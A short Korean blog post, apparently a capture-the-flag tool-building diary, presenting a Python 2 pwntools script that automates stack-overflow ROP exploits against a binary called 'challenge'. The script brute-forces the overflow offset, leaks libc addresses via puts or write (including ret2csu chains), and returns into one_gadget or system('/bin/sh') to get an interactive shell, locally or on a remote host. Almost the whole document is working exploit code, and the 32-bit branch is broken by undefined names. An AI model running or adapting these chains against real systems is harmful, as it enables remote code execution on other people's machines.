Auto_rop_개발_3일차

LeeDoHyun · April 12, 2020

그냥 전형적인 ROP만 풀립니다. 아직 32bit 오류터집니당

#!/usr/bin/env python
#-*-coding:utf8-*-
from pwn import *

# Pwntools logging verbosity and the remote endpoint. IP/PORT are
# placeholders that must be replaced with the real host and port.
context.log_level = "debug"
IP = "nc Server IP"
PORT = "nc Server PORT"

# Menu: one line per exploit shape; the number is what the dispatch at
# the bottom of the file compares `choice` against.
print('\n'.join((
    '=================================',
    'Change the binary name to challenge!',
    'example',
    '64bit) puts leak: 1',
    '64bit) libc csu init leak (puts): 2',
    '64bit) libc csu init leak (write): 3',
    '32bit) read leak: 4',
    '=================================',
)))

# NOTE: on Python 2 (this file uses print statements further down)
# input() evaluates the typed text, so the number is read as an int.
choice = input('your want exploit shape: ')

def puts_exploit():
	"""64-bit, shape 1: leak puts()'s libc address with a puts(puts@got) ROP
	chain, derive the libc base, then return into a hard-coded one_gadget.

	Everything is interactive: gadget addresses, remote/local mode and the
	Ubuntu version are read with input(), which on Python 2 (this file uses
	print statements) evaluates the typed text -- drive it only from a
	trusted terminal.  The overflow offset is brute-forced: every candidate
	padding length in range(1, 5000) gets its own connection or process.
	On success the session is handed to r.interactive(); nothing is returned.
	"""
	e = ELF("./challenge")
	pop_rdi = input('pop rdi gadget: ')
        # NOTE(review): `ret` is read but never used in this function.
        ret = input('return address: ')
        puts_plt = e.plt["puts"]
        puts_got = e.got["puts"]
        main = e.symbols["main"]

	print 'remote: 1, local: 2'
	rl = input('remote and local: ')
	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
		# one_gadget offsets are hard-coded for the author's two libc builds.
		# Any other answer leaves `libc`/`one_gadget` unbound; the bare except
		# inside the loop then hides the resulting error on every attempt.
        	if(one == 1):
                	libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

		# Offset brute force: a fresh remote connection per candidate length,
		# with a fixed 0.1 s pause around each send.
		for i in range(1, 5000):
			r = remote(IP, PORT)
			sleep(0.1)

			# Stage 1: padding, pop rdi; puts(puts@got); then a return to main
			# so a second payload can be sent to the same process.
			payload = "A"*(int(i))
			payload += p64(pop_rdi)
			payload += p64(puts_got)
			payload += p64(puts_plt)
			payload += p64(main)
     			r.sendline(payload)
                        sleep(0.1)

			# The leak parser assumes a 6-byte address whose top byte is 0x7f.
			# The bare except below swallows every failure (wrong offset, no
			# leak, unbound libc, even KeyboardInterrupt) and only prints "Fail".
			try:
				puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
				base = puts_leak - libc.symbols["puts"]
				oneshot = base + one_gadget

				info("buffer size = " + str(i))
       	 			info("puts leak = " + hex(puts_leak))
       	 			info("base addr = " + hex(base))
				info("oneshot addr = " + hex(oneshot))

				# Stage 2: same padding, return address replaced by the one_gadget
				# address, followed by ten zero qwords (presumably to satisfy the
				# gadget's stack constraints -- confirm).
		        	payload = "B"*(int(i))
				payload += p64(oneshot)
				payload += p64(0) * 10
        			r.sendline(payload)
        			r.interactive()
				break
			except:
				print ("Fail: " + str(i))
			# Skipped on the success path because of the break above.
			r.close()

	elif(rl == 2):
		# Local mode: identical to the remote branch except that process()
		# replaces remote().
        	one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
        	if(one == 1):
                	libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

                for i in range(1, 5000):
                        r = process("./challenge")
			sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p64(pop_rdi)
                        payload += p64(puts_got)
                        payload += p64(puts_plt)
                        payload += p64(main)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
                                base = puts_leak - libc.symbols["puts"]
                                oneshot = base + one_gadget

                                info("buffer size = " + str(i))
                                info("puts leak = " + hex(puts_leak))
                                info("base addr = " + hex(base))
                                info("oneshot addr = " + hex(oneshot))

                                payload = "B"*(int(i))
                                payload += p64(oneshot)
                                payload += p64(0) * 10
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
	else:
		print "No"
		exit()

def puts_csu_exploit():
	"""64-bit, shape 2: same puts() leak as puts_exploit, but the call is
	made through the two __libc_csu_init gadgets (ret2csu) instead of a
	pop rdi gadget, then return into a hard-coded one_gadget.

	Gadget addresses, remote/local mode and the Ubuntu version are read
	with input() (Python 2: the text is evaluated -- trusted terminal only).
	The overflow offset is brute-forced over range(1, 5000) with a new
	connection or process per attempt.  On success the session goes to
	r.interactive(); nothing is returned.
	"""
	e = ELF("./challenge")
	__libc_csu_init_gadget1 = input('__libc_csu_init gadget 1: ')
	__libc_csu_init_gadget2 = input('__libc_csu_init gadget 2: ')
	puts_got = e.got["puts"]
	# NOTE(review): `bss` is computed but never used in this function.
	bss = e.bss()
	main = e.symbols["main"]

	print 'remote: 1, local: 2'
        rl = input('remote and local: ')

	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
		# Hard-coded one_gadget offsets for the author's two libc builds; any
		# other answer leaves `libc`/`one_gadget` unbound (masked by the bare
		# except in the loop).
       		if(one == 1):
        		libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

	        for i in range(1, 5000):
        	        r = remote(IP, PORT)
			sleep(0.1)

			# Stage 1: after gadget 1 the six popped values are expected to land
			# in rbx, rbp, r12..r15 in that order (assumed -- confirm against the
			# binary's __libc_csu_init); gadget 2 then moves them into the
			# argument registers and calls [r12 + rbx*8], here puts(puts@got).
        	        payload = "A"*(int(i))
			payload += p64(__libc_csu_init_gadget1)
			payload += p64(0)
			payload += p64(1)
			payload += p64(puts_got)
			payload += p64(0)
			payload += p64(0)
			payload += p64(puts_got)

			# Seven zero qwords presumably absorb the add rsp/pop sequence that
			# follows gadget 2 before its ret (confirm); then return to main.
			payload += p64(__libc_csu_init_gadget2)
			payload += p64(0) * 7
			payload += p64(main)
			r.sendline(payload)
                        sleep(0.1)

			# Leak parser assumes a 6-byte address ending in 0x7f; the bare
			# except swallows every failure, including KeyboardInterrupt.
			try:
       	         		puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
       	                	base = puts_leak - libc.symbols["puts"]
                        	oneshot = base + one_gadget

                        	info("buffer size = " + str(i))
                        	info("puts leak = " + hex(puts_leak))
                        	info("base addr = " + hex(base))
                        	info("oneshot addr = " + hex(oneshot))

				# Stage 2: padding, one_gadget address, ten zero qwords.
                        	payload = "B"*(int(i))
                        	payload += p64(oneshot)
                        	payload += p64(0) * 10
                        	r.sendline(payload)
                       		r.interactive()
                        	break
			except:
                        	print ("Fail: " + str(i))
			# Not reached on the success path (break above).
                	r.close()

	elif(rl == 2):
		# Local mode: mirrors the remote branch with process() instead of
		# remote().
                one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
                if(one == 1):
                        libc = e.libc
                        one_gadget = 0x4526a
                elif(one == 2):
                        libc = ELF("libc-2.27.so")
                        one_gadget = 0x4f322

                for i in range(1, 5000):
                        r = process("./challenge")
			sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p64(__libc_csu_init_gadget1)
                        payload += p64(0)
                        payload += p64(1)
                        payload += p64(puts_got)
                        payload += p64(0)
                        payload += p64(0)
                        payload += p64(puts_got)

                        payload += p64(__libc_csu_init_gadget2)
                        payload += p64(0) * 7
                        payload += p64(main)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
                                base = puts_leak - libc.symbols["puts"]
                                oneshot = base + one_gadget

                                info("buffer size = " + str(i))
                                info("puts leak = " + hex(puts_leak))
                                info("base addr = " + hex(base))
                                info("oneshot addr = " + hex(oneshot))

                                payload = "B"*(int(i))
                                payload += p64(oneshot)
                                payload += p64(0) * 10
                                # NOTE(review): the stage-2 payload is sent twice here, unlike
                                # every other branch in this file -- probably a copy/paste slip.
                                r.sendline(payload)
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
	else:
		print "No"
		exit()

def write_csu_exploit():
	"""64-bit, shape 3: like puts_csu_exploit but the ret2csu call is
	write(1, write@got, 8), so the leak is write()'s libc address; then
	return into a hard-coded one_gadget.

	Gadget addresses, remote/local mode and the Ubuntu version are read
	with input() (Python 2: the text is evaluated -- trusted terminal only).
	The overflow offset is brute-forced with a new connection or process
	per attempt.  On success the session goes to r.interactive(); nothing
	is returned.
	"""
	e = ELF("./challenge")
	__libc_csu_init_gadget1 = input('__libc_csu_init gadget 1: ')
	__libc_csu_init_gadget2 = input('__libc_csu_init gadget 2: ')
	write_got = e.got["write"]
	# NOTE(review): `bss` is computed but never used in this function.
	bss = e.bss()
	main = e.symbols["main"]

	print 'remote: 1, local: 2'
        rl = input('remote and local: ')

	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
		# Hard-coded one_gadget offsets for the author's two libc builds; any
		# other answer leaves `libc`/`one_gadget` unbound (masked by the bare
		# except in the loop).
       		if(one == 1):
        		libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

	        for i in range(1, 5000):
        	        r = remote(IP, PORT)
			sleep(0.1)

			# Stage 1: six values for gadget 1 (rbx, rbp, r12..r15 -- assumed
			# order, confirm against the binary), so that gadget 2 calls
			# [r12 + rbx*8] = write@got with fd 1, buffer write@got, length 8.
                        payload = "A"*(int(i))
			payload += p64(__libc_csu_init_gadget1)
			payload += p64(0)
			payload += p64(1)
			payload += p64(write_got)
			payload += p64(8)
			payload += p64(write_got)
			payload += p64(1)

			# Seven zero qwords presumably cover the stack adjustment after
			# gadget 2 (confirm); then return to main for stage 2.
			payload += p64(__libc_csu_init_gadget2)
			payload += p64(0) * 7
			payload += p64(main)
			r.sendline(payload)
                        sleep(0.1)

			# Leak parser assumes a 6-byte address ending in 0x7f even though
			# write() emits 8 bytes; the bare except swallows every failure.
			try:
       	         		write_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
       	                	base = write_leak - libc.symbols["write"]
                        	oneshot = base + one_gadget

                        	info("buffer size = " + str(i))
                        	info("write leak = " + hex(write_leak))
                        	info("base addr = " + hex(base))
                        	info("oneshot addr = " + hex(oneshot))

				# Stage 2: padding, one_gadget address, ten zero qwords.
                        	payload = "B"*(int(i))
                        	payload += p64(oneshot)
                        	payload += p64(0) * 10
                        	r.sendline(payload)
                       		r.interactive()
                        	break
			except:
                        	print ("Fail: " + str(i))
			# Not reached on the success path (break above).
                	r.close()

	elif(rl == 2):
		# Local mode: mirrors the remote branch with process() instead of
		# remote().
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
       		if(one == 1):
        		libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

	        # NOTE(review): this loop stops at 500, every other loop in the file
	        # tries up to 5000 -- probably unintended.
	        for i in range(1, 500):
        	        r = process("./challenge")
			sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p64(__libc_csu_init_gadget1)
                        payload += p64(0)
                        payload += p64(1)
                        payload += p64(write_got)
                        payload += p64(8)
                        payload += p64(write_got)
                        payload += p64(1)

                        payload += p64(__libc_csu_init_gadget2)
                        payload += p64(0) * 7
                        payload += p64(main)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                write_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
                                base = write_leak - libc.symbols["write"]
                                oneshot = base + one_gadget

                                info("buffer size = " + str(i))
                                info("write leak = " + hex(write_leak))
                                info("base addr = " + hex(base))
                                info("oneshot addr = " + hex(oneshot))

                                payload = "B"*(int(i))
                                payload += p64(oneshot)
                                payload += p64(0) * 10
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
        else:
                print "No"
                exit()

def read_write_exploit():
	"""32-bit, shape 4: leak read()'s libc address with write(), stage
	"/bin/sh" into .bss and a libc address into read@got with read(),
	then call through read@plt.

	A pop;pop;pop;ret gadget (`pppr`) is read with input() to clear the
	three call arguments between chain links (Python 2: the text is
	evaluated -- trusted terminal only).  The overflow offset is
	brute-forced with a new connection or process per attempt; on success
	the session goes to r.interactive().  Nothing is returned.

	NOTE(review): as written both branches always print "Fail": the remote
	branch uses the undefined name `basie` and both branches log
	`puts_leak`, which this function never defines; the bare except hides
	the NameError.  This matches the post's remark that 32-bit still fails.
	"""
	e = ELF("./challenge")
	pppr = input("pppr gadget: ")
	write_plt = e.plt["write"]
	read_plt = e.plt["read"]
	read_got = e.got["read"]
	bss = e.bss()
	binsh = "/bin/sh\x00"

	print 'remote: 1, local: 2'
	rl = input('remote and local: ')
	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
		# `one_gadget` is set here but this function never uses it; only
		# `libc` matters.  Any other answer leaves `libc` unbound.
        	if(one == 1):
                	libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

		for i in range(1, 5000):
			r = remote(IP, PORT)
			sleep(0.1)

			# Link 1: write(1, read@got, 4) -- leaks read()'s address.
			payload = "A"*(int(i))
			payload += p32(write_plt)
			payload += p32(pppr)
			payload += p32(1)
			payload += p32(read_got)
			payload += p32(4)

			# Link 2: read(0, bss, len(binsh)) -- expects "/bin/sh\0" on stdin.
			payload += p32(read_plt)
			payload += p32(pppr)
			payload += p32(0)
			payload += p32(bss)
			payload += p32(len(binsh))

			# Link 3: read(0, read@got, 4) -- expects the 4-byte system address.
			payload += p32(read_plt)
			payload += p32(pppr)
			payload += p32(0)
			payload += p32(read_got)
			payload += p32(4)

			# Link 4: read@plt again, now resolving to whatever link 3 stored,
			# with a dummy return address (0) and bss as its single argument.
			payload += p32(read_plt)
			payload += p32(0)
			payload += p32(bss)
			r.sendline(payload)
			sleep(0.1)

			# Assumes the 4 leaked bytes are the very first bytes received.
			try:
				read_leak = u32(r.recv(4))
				base = read_leak - libc.symbols["read"]
				# NOTE(review): `basie` is undefined -> NameError on every attempt.
				system = basie + libc.symbols["system"]

				info("buffer size = " + str(i))
				# NOTE(review): `puts_leak` is never defined in this function.
       	 			info("puts leak = " + hex(puts_leak))
       	 			info("base addr = " + hex(base))
				info("system addr = " + hex(system))

				# Second send feeds links 2 and 3 in one line: the string first,
				# then the 4-byte address.
		        	payload = binsh
				payload += p32(system)
        			r.sendline(payload)
        			r.interactive()
				break
			except:
				print ("Fail: " + str(i))
			# Not reached on the success path (break above).
			r.close()

	elif(rl == 2):
		# Local mode: mirrors the remote branch with process() instead of
		# remote() (and without the `basie` typo).
                one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
                if(one == 1):
                        libc = e.libc
                        one_gadget = 0x4526a
                elif(one == 2):
                        libc = ELF("libc-2.27.so")
                        one_gadget = 0x4f322

                for i in range(1, 5000):
                        r = process("./challenge")
                        sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p32(write_plt)
                        payload += p32(pppr)
                        payload += p32(1)
                        payload += p32(read_got)
                        payload += p32(4)

                        payload += p32(read_plt)
                        payload += p32(pppr)
                        payload += p32(0)
                        payload += p32(bss)
                        payload += p32(len(binsh))

                        payload += p32(read_plt)
                        payload += p32(pppr)
                        payload += p32(0)
                        payload += p32(read_got)
                        payload += p32(4)

                        payload += p32(read_plt)
                        payload += p32(0)
                        payload += p32(bss)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                read_leak = u32(r.recv(4))
                                base = read_leak - libc.symbols["read"]
                                system = base + libc.symbols["system"]

                                info("buffer size = " + str(i))
                                # NOTE(review): `puts_leak` is undefined here too -> NameError.
                                info("puts leak = " + hex(puts_leak))
                                info("base addr = " + hex(base))
                                info("system addr = " + hex(system))

                                payload = binsh
                                payload += p32(system)
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
	else:
		print "No"
		exit()

# Dispatch on the menu number typed above; order and `==` comparison are
# kept so non-int answers behave exactly as the original if/elif chain.
# Any value that matches none of the shapes exits the script.
for code, runner in (
    (1, puts_exploit),
    (2, puts_csu_exploit),
    (3, write_csu_exploit),
    (4, read_write_exploit),
):
    if choice == code:
        runner()
        break
else:
    exit()
